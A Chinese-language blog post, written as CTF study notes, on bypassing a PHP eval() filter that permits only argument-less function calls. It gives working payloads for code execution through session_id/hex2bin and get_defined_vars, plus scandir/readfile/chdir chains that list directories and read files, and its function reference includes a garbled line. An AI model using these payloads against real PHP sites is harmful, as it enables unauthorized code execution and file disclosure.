<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="无参函数的RCE"><meta name="keywords" content="php"><meta name="author" content="Dar1in9"><meta name="copyright" content="Dar1in9"><title>无参函数的RCE | Dar1in9's Blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.7.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.7.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer></script><link rel="dns-prefetch" href="http://ta.qq.com"><script>(function() {
   var hm = document.createElement("script");
   hm.src = "https://tajs.qq.com/stats?sId=&lt;script type=&quot;text/javascript&quot; src=&quot;http://tajs.qq.com/stats?sId=66549793&quot; charset=&quot;UTF-8&quot;&gt;&lt;/script&gt;";
   var s = document.getElementsByTagName("script")[0];
   s.parentNode.insertBefore(hm, s);
 })();</script><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: {"appId":"MY1GAADR9W","apiKey":"5032629da4e94f659d98a4052bc1c5cd","indexName":"blog","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  }
} </script><meta name="generator" content="Hexo 4.2.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#http-headers传参进行RCE"><span class="toc-number">1.</span> <span class="toc-text">http headers传参进行RCE</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#使用get-post传参进行RCE"><span class="toc-number">2.</span> <span class="toc-text">使用get&#x2F;post传参进行RCE</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#使用函数读取文件"><span class="toc-number">3.</span> <span class="toc-text">使用函数读取文件</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#读取当前目录下的文件"><span class="toc-number">3.1.</span> <span class="toc-text">读取当前目录下的文件</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#获得”-”"><span class="toc-number">3.1.1.</span> <span class="toc-text">获得”.”</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#读取文件"><span class="toc-number">3.1.2.</span> <span class="toc-text">读取文件</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#读取上级目录下的文件"><span class="toc-number">3.2.</span> <span class="toc-text">读取上级目录下的文件</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#跳转到上一级"><span class="toc-number">3.2.1.</span> <span class="toc-text">跳转到上一级</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#读取文件-1"><span class="toc-number">3.2.2.</span> <span class="toc-text">读取文件</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#相关函数"><span class="toc-number">4.</span> <span class="toc-text">相关函数</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/01.png"></div><div class="author-info__name text-center">Dar1in9</div><div class="author-info__description text-center">人间值得，未来可期</div><div class="follow-button"><a href="https://github.com/Dar1in9s" target="_blank" rel="noopener">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">52</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">22</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/18085.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Dar1in9's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">无参函数的RCE</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-01-25</time><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">1.5k</span><span class="post-meta__separator">|</span><span>阅读时长: 5 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>最近遇到挺多rce的题，这里记录一下关于无参函数的rce。</p>
<a id="more"></a>
<p>先看看代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="string">';'</span> === preg_replace(<span class="string">'/[^\W]+\((?R)?\)/'</span>, <span class="string">''</span>, $_GET[<span class="string">'code'</span>])) &#123;    </span><br><span class="line">    <span class="keyword">eval</span>($_GET[<span class="string">'code'</span>]);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>


<h2 id="http-headers传参进行RCE"><a href="#http-headers传参进行RCE" class="headerlink" title="http headers传参进行RCE"></a>http headers传参进行RCE</h2><p>查找php中关于session的函数，发现有一个<code>session_id</code> 函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">session_id ([string$id ] ) :string</span><br></pre></td></tr></table></figure>
<p>session_id() 可以用来获取/设置当前会话 ID。<br>那么可以用这个函数来获取cookie中的phpsessionid了，并且这个值我们是可控的。<br>但其有限制：</p>
<blockquote>
<p>文件会话管理器仅允许会话 ID 中使用以下字符：a-z A-Z 0-9 ,（逗号）和 - 减号）</p>
</blockquote>
<p>可以将我们的参数转化为16进制穿进去，之后再用hex2bin()函数转换回来就可以了。</p>
<p>所以，payload可以为：<code>code=eval(hex2bin(session_id()));</code><br>但session_id必须要开启session才可以使用，所以我们要先使用session_start。<br>最后，payload：<code>eval(hex2bin(session_id(session_start())));</code><br>在http头中设置PHPSSID为想要执行代码的16进制</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hex(<span class="string">"phpinfo();"</span>)=<span class="number">706870696e666</span>f28293b</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20191031133737781.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpbGVuY2UxXw==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>成功rce</p>
<h2 id="使用get-post传参进行RCE"><a href="#使用get-post传参进行RCE" class="headerlink" title="使用get/post传参进行RCE"></a>使用get/post传参进行RCE</h2><p>先来看看几个函数：</p>
<blockquote>
<p>get_defined_vars ( void ) : array  返回由所有已定义变量所组成的数组<br>此函数返回一个包含所有已定义变量列表的多维数组，这些变量包括环境变量、服务器变量和<strong>用户定义的变量</strong>。</p>
</blockquote>
<p>试一下，<img src="https://img-blog.csdnimg.cn/20191031134934609.png" alt="在这里插入图片描述"><br>可见我们的b参数在里面，那么这么把它提取出来呢<br>再找找位置函数<br>发现GET的参数在数组的第一个，于是用到current函数。</p>
<blockquote>
<p>current ( array &amp;$array ) : mixed  返回数组中的当前单元<br>每个数组中都有一个内部的指针指向它“当前的”单元，初始指向插入到数组中的第一个单元。</p>
</blockquote>
<p>此时，我们就可以提取到GET参数的数组了<br><img src="https://img-blog.csdnimg.cn/20191031135319107.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpbGVuY2UxXw==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>我们的b在最后一个位置，于是可以用end函数来取出来。</p>
<blockquote>
<p>end ( array &amp;$array ) : mixed end()<br>将 array 的内部指针移动到最后一个单元并返回其值。</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/20191031135413923.png" alt="在这里插入图片描述"><br>成功取到了传入的b参数，于是在配合eval就可以利用参数b来达到rce的目的了。</p>
<p>最终payload：<code>code=eval(end(current(get_defined_vars())));&amp;b=phpinfo();</code><br><img src="https://img-blog.csdnimg.cn/20191031135547220.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpbGVuY2UxXw==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h2 id="使用函数读取文件"><a href="#使用函数读取文件" class="headerlink" title="使用函数读取文件"></a>使用函数读取文件</h2><h3 id="读取当前目录下的文件"><a href="#读取当前目录下的文件" class="headerlink" title="读取当前目录下的文件"></a>读取当前目录下的文件</h3><p>读取当前目录下的文件关键在于使用<code>scandir(&quot;.&quot;)</code>等函数将当前目录中的文件列出来，之后再使用<code>readfile()</code>等函数来读取文件。</p>
<h4 id="获得”-”"><a href="#获得”-”" class="headerlink" title="获得”.”"></a>获得”.”</h4><ol>
<li>使用chr()函数。<br> <code>chr()     //将数字当做ascii码转化成字符，传入的参数会自动模256</code><ul>
<li>使用time()函数动态生成数字:<br><code>time()</code>函数返回时间戳，配合<code>chr()</code>，一定时间内一定会有<code>chr(time())</code>生成的字符为<code>.</code></li>
<li>构造<code>chr(46)</code>生成<code>.</code> :<br><code>chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))</code></li>
</ul>
</li>
<li>使用dirname(xxx)可以生成<code>.</code><br>例如：<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">dirname(time())</span><br><span class="line">dirname(<span class="keyword">True</span>)</span><br><span class="line">dirname(phpversion())</span><br></pre></td></tr></table></figure></li>
<li>用其他函数。<br><code>current(localeconv())</code>的值也为<code>.</code></li>
</ol>
<h4 id="读取文件"><a href="#读取文件" class="headerlink" title="读取文件"></a>读取文件</h4><p>获取<code>.</code>后可以使用<code>scandir()</code>等函数列举当前目录下的文件，之后再使用数组相关函数来得到特定文件，最后使用<code>readfile()</code>等函数读取文件<br><br>例如：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">readfile(next(array_reverse(scandir(chr(time())))))  <span class="comment">//读取倒数第二个文件</span></span><br><span class="line"></span><br><span class="line">readfile(current(array_reverse(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))))))  <span class="comment">//读取获取最后一个文件</span></span><br><span class="line"></span><br><span class="line">readfile(array_rand(array_flip(scandir(current(localeconv())))))  <span class="comment">//随机读取目录下的一个文件</span></span><br></pre></td></tr></table></figure>
<h3 id="读取上级目录下的文件"><a href="#读取上级目录下的文件" class="headerlink" title="读取上级目录下的文件"></a>读取上级目录下的文件</h3><p>读取上级目录的文件的基本思想是先使用<code>chdir()</code>改变工作目录，之后再读取目录下的文件。</p>
<h4 id="跳转到上一级"><a href="#跳转到上一级" class="headerlink" title="跳转到上一级"></a>跳转到上一级</h4><ol>
<li><p>绝对路径<br>使用<code>getcwd()</code>可获得当前目录路径，再使用<code>dirname()</code>即可获得当前目录的上一级目录路径<br>即：<code>chdir(dirname(getcwd()))</code>即可跳转到上一级目录</p>
</li>
<li><p>相对路径<br>使用相对路径进行目录跳转关键在于获得<code>..</code>，而<code>..</code>可以由<code>next(scandir(&quot;.&quot;))</code>获得。<br><br>这里的<code>.</code>的获得可以使用上面的方法。</p>
</li>
</ol>
<h4 id="读取文件-1"><a href="#读取文件-1" class="headerlink" title="读取文件"></a>读取文件</h4><p>跳转目录后还需要再进行列目录，读文件的操作，因此这时还需要<code>.</code>。<br>目录跳转后<code>chdir</code>返回的是布尔型</p>
<ol>
<li><p><code>dirname()</code>可以接受布尔型参数，并且返回值恰好为<code>.</code><br>因此，可以这样写：<code>dirname(chdir(&quot;..&quot;))</code></p>
</li>
<li><p><code>time()</code>可以接受布尔型参数，可以再使用<code>chr()</code>获得一个<code>.</code>来列当前目录的文件。<code>current(localtime(time(chdir(&quot;..&quot;))))</code> 结果为当前时间的秒数，也就是一分钟内会有一次值为46.<br> 列目录下的文件：<code>scandir(chr(current(localtime(time(chdir(&quot;..&quot;))))))</code></p>
<p> 再使用<code>scandir</code>扫描目录：`scandir(chr(time(chdir(next(scandir(chr(time()))))))</p>
</li>
<li><p>若跳转目录时使用的<code>time()</code>函数获得的<code>&quot;.&quot;</code>，那么此时的<code>chr(time())</code>值就为<code>.</code>.<br><code>scandir(chr(time(chdir(next(scandir(chr(time()))))))</code></p>
</li>
</ol>
<p>列出目录后就可以使用数组相关函数和读文件函数来读文件了。</p>
<h2 id="相关函数"><a href="#相关函数" class="headerlink" title="相关函数"></a>相关函数</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">getallheaders()       <span class="comment">//获取所有http header信息，返回一个数组</span></span><br><span class="line">get_defined_vars()    <span class="comment">//获取所有已定义变量，返回一个数组 </span></span><br><span class="line">getenv()              <span class="comment">//获取环境变量的值，返回一个数组</span></span><br><span class="line"></span><br><span class="line">array_rand($Arr)      <span class="comment">//从数组键名中随机取出一个或多个单元</span></span><br><span class="line">array_flip($Arr)      <span class="comment">//将数组中的键名变成值，值变成键名</span></span><br><span class="line">($Arr)   <span class="comment">//对数组进行逆向排序</span></span><br><span class="line">arraarray_reversey_walk($Arr,callback)      <span class="comment">//对数组的每个元素调用用户自定义函数</span></span><br><span class="line">shuffle($Arr)         <span class="comment">//对数组进行随机排序返回True/False</span></span><br><span class="line">current($Arr)         <span class="comment">//返回当前数组指针所指的元素，但不移动数组指针。</span></span><br><span class="line">pos($Arr)             <span class="comment">//current的别名函数</span></span><br><span class="line">prev($Arr)            <span class="comment">//将数组指针向前移动一个位置</span></span><br><span class="line">next($Arr)            <span class="comment">//将数组指针向后移动一个位置</span></span><br><span class="line">end($Arr)             <span class="comment">//将数组指针移动到数组最后一个元素，并将其元素值返回</span></span><br><span class="line">reset($Arr)           <span class="comment">//重置元素指针到第一个元素位置处</span></span><br><span class="line">key($Arr)             <span class="comment">//返回当前数组指针所在元素的键</span></span><br><span class="line">sort($Arr)            <span class="comment">//将数组中的元素从小到大排序</span></span><br><span class="line"></span><br><span class="line">dirname($path)        <span class="comment">//返回路径中的目录部分</span></span><br><span class="line">chdir($dir)           <span class="comment">//改变目录，返回值为布尔型</span></span><br><span class="line">getcwd()              <span class="comment">//取得当前工作目录</span></span><br><span class="line"></span><br><span class="line">time()                <span class="comment">//获取当前时间戳</span></span><br><span class="line">localtime()           <span class="comment">//返回本地时间，形式为数组，数组内容为秒数、分钟数、小时数...</span></span><br></pre></td></tr></table></figure></div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Dar1in9</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://dar1in9s.github.io/2020/01/25/%E6%97%A0%E5%8F%82%E5%87%BD%E6%95%B0%E7%9A%84RCE/">http://dar1in9s.github.io/2020/01/25/%E6%97%A0%E5%8F%82%E5%87%BD%E6%95%B0%E7%9A%84RCE/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://Dar1in9s.github.io">Dar1in9's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/php/">php</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/01/27/%E5%85%B3%E4%BA%8Ephp%20session%E5%8F%8A%E5%85%B6session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/"><i class="fa fa-chevron-left">  </i><span>关于php session及其session反序列化</span></a></div><div class="next-post pull-right"><a href="/2020/01/25/shadowsocks%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%AE%89%E8%A3%85/"><span>shadowsocks服务器安装</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/18085.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2020 By Dar1in9</div><div class="framework-info"><span>驱动 - </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody" target="_blank" rel="noopener"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.7.0"></script><script src="/js/fancybox.js?version=1.7.0"></script><script src="/js/sidebar.js?version=1.7.0"></script><script src="/js/copy.js?version=1.7.0"></script><script src="/js/fireworks.js?version=1.7.0"></script><script src="/js/transition.js?version=1.7.0"></script><script src="/js/scroll.js?version=1.7.0"></script><script src="/js/head.js?version=1.7.0"></script><script src="/js/search/algolia.js"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex@latest/dist/katex.min.css"><script src="https://cdn.jsdelivr.net/npm/katex-copytex@latest/dist/katex-copytex.min.js"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex-copytex@latest/dist/katex-copytex.min.css"><script src="/js/katex.js"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="algolia-search"><div class="search-dialog__title" id="algolia-search-title">Algolia</div><div id="algolia-input-panel"><div id="algolia-search-input"></div></div><hr><div id="algolia-search-results"><div id="algolia-hits"></div><div id="algolia-pagination"></div><div id="algolia-stats"></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>